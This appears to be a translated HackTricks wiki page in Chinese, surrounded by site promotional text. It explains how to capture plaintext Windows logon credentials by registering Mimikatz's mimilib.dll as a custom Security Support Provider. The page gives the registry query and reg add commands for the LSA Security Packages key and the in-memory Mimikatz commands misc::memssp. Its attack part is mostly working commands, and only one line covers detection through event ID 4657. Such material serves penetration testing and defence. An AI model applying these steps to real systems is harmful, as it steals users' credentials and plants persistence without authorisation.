4.3 KiB
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一个网络安全公司工作吗?你想在 HackTricks 中看到你的公司广告吗?或者你想获得PEASS 的最新版本或下载 HackTricks 的 PDF 版本吗?请查看订阅计划!
-
发现我们的独家 NFT 收藏品The PEASS Family
-
加入 💬 Discord 群组 或 Telegram 群组,或者在 Twitter 上关注我 🐦@carlospolopm。
-
通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。
自定义 SSP
在这里了解什么是 SSP(安全支持提供者)
你可以创建自己的 SSP 来捕获用于访问机器的凭据的明文。
Mimilib
你可以使用 Mimikatz 提供的 mimilib.dll 二进制文件。这将在一个文件中记录所有明文凭据。
将 dll 放在 C:\Windows\System32\ 目录下
获取现有的 LSA 安全包列表:
{% code title="attacker@target" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
{% endcode %}
将mimilib.dll添加到安全支持提供程序列表(安全包)中:
PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
在内存中
您还可以直接使用Mimikatz将其注入到内存中(请注意,这可能会有点不稳定/无法正常工作):
privilege::debug
misc::memssp
这个方法在重启后不会生效。
缓解措施
事件ID 4657 - 审计HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages的创建/更改
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
你在一家网络安全公司工作吗?想要在HackTricks中宣传你的公司吗?或者你想要获取最新版本的PEASS或下载PDF格式的HackTricks吗?请查看订阅计划!
-
发现我们的独家NFTs收藏品——The PEASS Family
-
加入💬 Discord群组或电报群组,或者关注我在Twitter上的🐦@carlospolopm。
-
通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。